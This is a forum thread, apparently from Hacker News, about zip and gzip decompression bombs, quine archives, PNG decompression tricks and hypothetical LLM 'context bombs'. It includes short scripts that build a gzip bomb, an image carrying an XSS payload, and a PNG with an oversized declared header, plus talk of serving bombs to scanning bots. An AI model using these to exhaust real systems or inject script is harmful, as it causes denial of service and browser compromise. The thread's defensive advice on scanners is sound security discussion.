Another fun one is the .zip or .tar.gz file that decompresses to itself: https://research.swtch.com/zip
If you are processing emails for security reasons, and want to find viruses even if they are in archive files, it's easy to write the code to "just keep unarchiving until we're out of things to unarchive", but not only can that lead to quite astonishing expansions, it can actually be a process that never terminates at all.
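A minimal sketch of the guard rails such a scanner needs (the function and limits here are hypothetical, not from any particular AV product): cap both the nesting depth and a cumulative expansion budget, so neither deep nesting nor a quine archive can run forever.

```python
import zipfile

MAX_DEPTH = 5              # hypothetical nesting limit
MAX_TOTAL_BYTES = 1 << 30  # hypothetical 1 GiB budget across all levels

def scan_archive(path, depth=0, budget=MAX_TOTAL_BYTES):
    """Recursively scan a zip, refusing to exceed depth or byte budgets."""
    if depth > MAX_DEPTH:
        raise RuntimeError("nested too deeply; treating as hostile")
    with zipfile.ZipFile(path) as zf:
        for info in zf.infolist():
            budget -= info.file_size  # declared uncompressed size
            if budget < 0:
                raise RuntimeError("expansion budget exceeded; treating as hostile")
            # extract the member to a temp file, scan it, and if it is itself
            # an archive, recurse: scan_archive(tmp, depth + 1, budget)
            # (declared sizes can lie, so also enforce the cap while streaming)
    return budget
```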
I remember when I first read about these, and "a small file that decompresses to a gigabyte" was also "a small file that decompresses to several multiples of your entire hard disk space" and even servers couldn't handle it. Now I read articles like this one talking about "oh yeah Evolution filled up 100GB of space" like that's no big deal.
If you have a recursive decompressor you can still make small files that uncompress to large amounts even by 2025 standards, because the symbols the compressor will use to represent "as many zeros as I can have" will themselves be redundant. The rule that you can't compress already-compressed content doesn't necessarily apply to these sorts of files.
A few years ago David Fifield invented a technique that provides a million-to-one non-recursive expansion by overlapping the file streams: https://www.bamsoftware.com/hacks/zipbomb/
Might be fun to respond with one of these to malicious requests for /.env, /.git/config and /.aws/credentials instead of politely returning 404s.
I think someone posted a blog post from someone who does exactly that in the last couple of months? Any time they got hits on their site from misbehaving bots, they returned a gzip bomb in the HTTP response.
I remember that also.
edit - this? https://idiallo.com/blog/zipbomb-protection
Yes that's the one.
It’s definitely tempting, but I prefer not to piss off people who are already being actively malicious.
It's all just spray-and-pray crap. You're extremely unlikely to be their target, they're just looking for a convenient shell for a botnet. The most likely way they'll handle it if you do actually break them is just blacklist your address. You're not going to be worth the effort.
Isn’t this how a court system works?
I've been sending a nice 10GB gzip bomb (12MB after compression, rate limited download speed) to people that send various malicious requests. I think I might update it tonight with this other approach.
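For anyone curious about the arithmetic: that ~10 GB to 12 MB ratio is close to DEFLATE's ceiling on constant input. A sketch of generating such a file with Python's gzip module (the filename is made up):

```python
import gzip

# Stream ~10 GiB of zeros into a gzip file in 1 MiB chunks.
# DEFLATE tops out near 1032:1 on constant input, so the output
# lands around 10 MB -- in line with the ~12 MB figure above.
CHUNK = b"\x00" * (1 << 20)

with gzip.open("bomb.gz", "wb", compresslevel=9) as f:
    for _ in range(10 * 1024):  # 10240 x 1 MiB = 10 GiB
        f.write(CHUNK)
```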
Can't you just serve /dev/urandom?
And eat up your bandwidth?
> Now I read articles like this one talking about "oh yeah Evolution filled up 100GB of space" like that's no big deal.
Is this actually a practical issue, though? Windows, Mac and Linux all support transparent compression at the filesystem level, so 100GB of /dev/zero isn't actually going to fill much space at all.
That's not switched on by default unless you use a filesystem like ZFS.
I'd be curious if there's an LLM prompt equivalent of a zip bomb that will explode the context window. I know there are deterministic limits on the context window, but future LLMs _are_ going to have strange loops and are going to be very susceptible to circular reasoning.
Before AGI, there will be an untenably gullible general intelligence.
I've seen LLMs get into loops because they forgot what they were trying to do. For instance, I asked an LLM to write some code to search for certain types of wordplay, and it started making a word list (rather than writing code to pull in a standard dictionary), and then it got distracted and just kept listing words until it ran out of time.
One of the things that will likely _characterize_ AGI are nondeterministic loops.
My bet is that if AGI is possible it will take a form that looks something like

x_(n+1) = A * x_n * (1 - x_n)

where x is a billions-long vector and the parameters in A (sizeof(x)^2?) are trained and also tuned to have period 3 or nearly period three, for a meta-stable, near-chaotic progression of x. "Period three implies chaos": https://www.its.caltech.edu/~matilde/LiYorke.pdf
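A scalar toy version of that map is the classic logistic map, and the period-3 behaviour is easy to see numerically (the r values below are standard choices for the logistic map, not from the comment):

```python
# Logistic map x_{n+1} = r * x_n * (1 - x_n). Near r = 3.83 the orbit
# settles into a period-3 cycle; by Li-Yorke, period 3 implies chaotic
# orbits exist as well.
def orbit(r, x=0.5, warmup=1000, n=6):
    for _ in range(warmup):  # discard the transient
        x = r * x * (1 - x)
    out = []
    for _ in range(n):
        x = r * x * (1 - x)
        out.append(round(x, 4))
    return out

print(orbit(3.83))  # three values repeating: the period-3 window
print(orbit(3.90))  # no repetition: the chaotic regime
```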
That is, if AGI is possible at all without wetware.
Chaos isn't intelligence. Chaos is unmanageable growth in your solution space, the opposite of what you want.
What's confusing to me is the dual use of the word entropy in both physical science and communication. The local minima are somehow stable in a world of increasing entropy. How do these local minima ever form when there's such a large arrow of entropy?
Certainly intelligence is a reduction of entropy, but it's also certainly not stable. Just like cellular automata (https://record.umich.edu/articles/simple-rules-can-produce-c...), loops that are stable can't evolve, but loops that are unstable have too much entropy.
So we're likely searching for a system that's meta-stable within a small range of input entropy (physical) and output entropy (information).
There are theories and evidence that your brain operates hovering on the edge of the phase transition to chaos:
https://en.m.wikipedia.org/wiki/Critical_brain_hypothesis
If you have any system that tries to gravitate to a local minimum, it is almost impossible not to make Newton's fractal with it. Classical feed-forward network learning looks pretty much like Newton's method to me. Please take a look at https://en.m.wikipedia.org/wiki/Newton%27s_method
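For reference, the iteration behind the Newton fractal is just Newton's method applied to a complex polynomial; a minimal sketch for z^3 - 1 (the textbook example, nothing specific to neural nets):

```python
# Newton's method z <- z - f(z)/f'(z) for f(z) = z^3 - 1.
# Coloring each starting point by which cube root of 1 it converges
# to produces the Newton fractal: the basin boundaries are fractal.
def newton_root(z, steps=50):
    for _ in range(steps):
        z = z - (z**3 - 1) / (3 * z**2)
    return z

# Nearby starting points can land on different roots:
print(newton_root(complex(-0.51, 0.1)))
print(newton_root(complex(-0.51, -0.1)))
```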
I ran into one of these in the very early 00s; I was working at a university (back in the days when a couple of people would run all the central servers, running Linux on beige PCs). We had some anti-spam/AV software hooked into Postfix that looked at every incoming email, and the server kept running out of disk space.
Eventually I tracked it down to an email which contained a zip of stock trading data – just the three-letter stock code and the shift. It wasn't malicious, it just had an extraordinarily high compression ratio!
That Evolution mail caching behaviour is really sketchy. I wonder if it could be used for an exploit in the right scenario. If nothing else, it’s a good way to make an email that looks completely different depending on which client it’s opened in.
> it’s a good way to make an email that looks completely different depending on which client it’s opened in.
Well, for that you'd use the differences in HTML & CSS support and filtering ...
I guess the reason they added this was that they noticed many mails contain the same tracking images and decided to cut off the tracking data that way.
I don't think this was done on purpose. If the query string is "?a=b" that's fine, and it's used in the cache filename. But if the query string is "?a" then it's excluded from the cache filename.
Either way, the correct full URL is fetched with the full query string. It's just how it's cached that is affected.
So can you construct a valid image that would also act as a zip bomb?
JPEG and other lossy image formats should allow some of that, but it depends on the compatibility between gzip's compression and the image format's.
There is that example where you have a "zero image" of big dimensions, but can you actually conflate gzip and image compression?
Not what you were asking for but my favorite valid image is exploit code as PNG image data. It's just pixels in specific colors that, after compression, have the bytes in the file spell out something like <script>alert(1)</script>
I consulted for a bank once where the server stripped metadata and re-encoded images from scratch, and the devs thought that would remove any maliciousness. It's just pixels, right? I might have thought so as well, but I had this idea and wanted to double check, and it didn't take long to find someone smarter than me had already done the work: https://web.archive.org/web/20250713054441/http://www.idontp... (By now I see there are a dozen commercial parties that rank higher for this topic. Marginalia search helped me re-find the OG post just now)
Edit, thought I should add: the solution is to specify the correct content type. Don't let your PHP interpreter interpret files in the user uploads directory. Don't serve images with content-type text/html because the browser will interpret it as HTML (as instructed) and run any code inside on your domain ('origin'). Mark data as separate from code whenever possible, or escape it when that's impossible
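A simplified sketch of the principle (the linked post goes further and picks pixel values whose recompressed DEFLATE output contains the payload; here we just use stored blocks so the pixel bytes survive verbatim):

```python
import struct, zlib

# Build a tiny valid grayscale PNG whose pixel bytes ARE the payload.
# Compressing the scanline with zlib level 0 emits stored (uncompressed)
# DEFLATE blocks, so the payload appears verbatim inside the IDAT chunk.
payload = b"<script>alert(1)</script>"

def chunk(ctype, data):
    return (struct.pack(">I", len(data)) + ctype + data
            + struct.pack(">I", zlib.crc32(ctype + data)))

width, height = len(payload), 1
ihdr = struct.pack(">IIBBBBB", width, height, 8, 0, 0, 0, 0)  # 8-bit grayscale
scanline = b"\x00" + payload       # filter byte 0, then one byte per pixel
idat = zlib.compress(scanline, 0)  # level 0 = stored blocks, bytes kept as-is

png = (b"\x89PNG\r\n\x1a\n" + chunk(b"IHDR", ihdr)
       + chunk(b"IDAT", idat) + chunk(b"IEND", b""))
open("payload.png", "wb").write(png)
assert payload in png              # the exploit string is inside the file
```

Served with the wrong content type, a browser will happily treat those bytes as HTML, which is exactly why the content-type advice above matters.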
I don't think you can do it with JPEG, but you could probably do it with PNG, which uses basically the same compression algorithm as zip.
Deflate allows a maximum compression ratio of 1000:1 or thereabouts.
Considering I’ve seen real world JPEGs above 300:1 (https://eoimages.gsfc.nasa.gov/images/imagerecords/73000/739...) I would not be surprised if you could craft a jpeg getting very close to or exceeding 4 digits.
The reason it doesn't work with JPEG is that JPEG isn't a description of individual pixels but rather of how you'd calculate what each pixel should be. That's part of the reason you can progressively load JPEG data.
PNG is actually a description of the RGB value of each individual pixel. That's why I believe you could PNG-bomb: you could have a 2-billion-by-2-billion black-pixel image, which would ultimately eat up a bunch of space in your GPU and memory to decode.
Perhaps something similar is possible with a JPEG, but it really has nothing to do with the compression info. JPEGs have a max size of 65,535×65,535, which would keep you from exploding them.
DEFLATE can only obtain a best-case compression ratio approaching 1032:1. (Put the byte to repeat in a preceding block, and set "0" = 256 and "1" = 285 for the literal/length code and "0" = 0 for the distance code. Then "10" will output 258 bytes.) This means a 2 Gpx × 2 Gpx PNG image will still be at least ~3.875 PB.
If you send it compressed over the wire, you could get another factor of 1032, or perhaps more depending on which algorithms the client supports. Also, you could generate it on demand as a data stream. But these run the risk of the client stopping the transfer before ever trying to process the image.
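The 1032:1 ceiling is easy to verify empirically, e.g. by compressing runs of zeros with Python's zlib and watching the ratio flatten out:

```python
import zlib

# Compress increasingly long runs of zeros; the ratio converges
# toward DEFLATE's theoretical ceiling of ~1032:1.
for n in (10**6, 10**7, 10**8):
    out = zlib.compress(b"\x00" * n, 9)
    print(f"{n:>9} -> {len(out):>6} bytes (ratio {n / len(out):,.0f}:1)")
```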
There are some stupid tricks you can pull with image formats like emitting the headers for a gigantic image without including enough image data to actually encode the whole image. Most decoders will try to allocate a buffer up front (possibly as much as 16 GB for a 65535x65535 image!) before discovering that the image is truncated.
The same trick works with PNG, actually. Possibly even better: it uses a pair of 32-bit integers for the resolution.
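A sketch of that header trick for PNG (hypothetical, for illustration): declare enormous dimensions in IHDR and then simply stop, so a decoder that allocates up front commits the memory before noticing there's no pixel data:

```python
import struct, zlib

def chunk(ctype, data):
    return (struct.pack(">I", len(data)) + ctype + data
            + struct.pack(">I", zlib.crc32(ctype + data)))

# IHDR claims (2^31 - 1) x (2^31 - 1) pixels -- PNG's maximum --
# but the file contains no IDAT data at all.
ihdr = struct.pack(">IIBBBBB", 2**31 - 1, 2**31 - 1, 8, 0, 0, 0, 0)
png = b"\x89PNG\r\n\x1a\n" + chunk(b"IHDR", ihdr) + chunk(b"IEND", b"")
open("huge-header.png", "wb").write(png)  # under 50 bytes on disk
```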
You can with PNG, but you have to set a high pixel resolution and most viewers have hard limits before it gets too crazy.
Is there a reason the malicious part of the payload has to be pixels? You could have a 100x100px image with thousands of 2GB iTXt chunks, no? That would bypass naive header checks that only reject based on canvas size.
You'd probably do zTXt chunks, right? But regardless, I'd guess that there's nothing that would cause a renderer to actually read that chunk.
The iTXt chunk can also be compressed <https://www.w3.org/TR/png/#10CompressionOtherUses>.
Ah yes, that makes sense.
However, it may work with the article's process: a 100x100 PNG with lots of 2GB-of-nothing iTXt chunks could be gzipped and served with `Content-Encoding: gzip`, so it would pass the "is a valid png" and "not pixel-huge image" checks but still require decompression in order to view it.
Hmm, that reminds me: it idly crossed my mind recently whether AIs with online RAG have decent zip-bomb protection. This thought was provoked when I realised Perplexity would find, download and (apparently) analyse spreadsheet content. I'm sure there are zip-bomb equivalents in binary formats like .xlsx, PDF, .docx, etc.
In addition to zip bombing AIs with file parsers, I've wondered about 'context bombs' in the sense of trigger phrases that trip up LLMs into getting stuck repeating phrases or reasoning evaluations without ever hitting an end-of-sequence (EOS) token, thus running a system up against API call limits / burning credits / effectively DDoSing services, etc.
Due to the inherent fuzziness/diversity in all models right now, I don't think there is a universal approach to this idea, but it is something people deploying these systems may want to try to detect.
> I'm sure there are zip-bomb equivalents in binary formats like .xlsx, PDF, .docx, etc.
Yes. Both docx and xlsx are literally just zips of XML files with a different extension. PDF can contain zlib streams, which use DEFLATE compression just like gzip, so all the mentioned methods apply to all three formats.
Doesn't that make zip bombs trivial to prevent?
Most things are trivial to prevent if you know of and think to check for them.
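One such check, as a sketch (the function name and thresholds are made up): compare the declared uncompressed sizes against the archive's own size before extracting anything.

```python
import os
import zipfile

def looks_like_bomb(path, max_ratio=100, max_bytes=1 << 30):
    """Flag archives whose declared expansion is suspiciously large.

    Headers can lie, so a streaming byte cap during actual extraction
    is still needed -- this only catches honestly-declared bombs."""
    compressed = os.path.getsize(path)
    with zipfile.ZipFile(path) as zf:
        declared = sum(info.file_size for info in zf.infolist())
    return declared > max_bytes or declared > max_ratio * compressed
```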
How does it work with Claws Mail/Sylpheed?
Yet another reason to prevent emails from downloading stuff from remote servers...
It appears that you can't do these sorts of things with CID embedded images...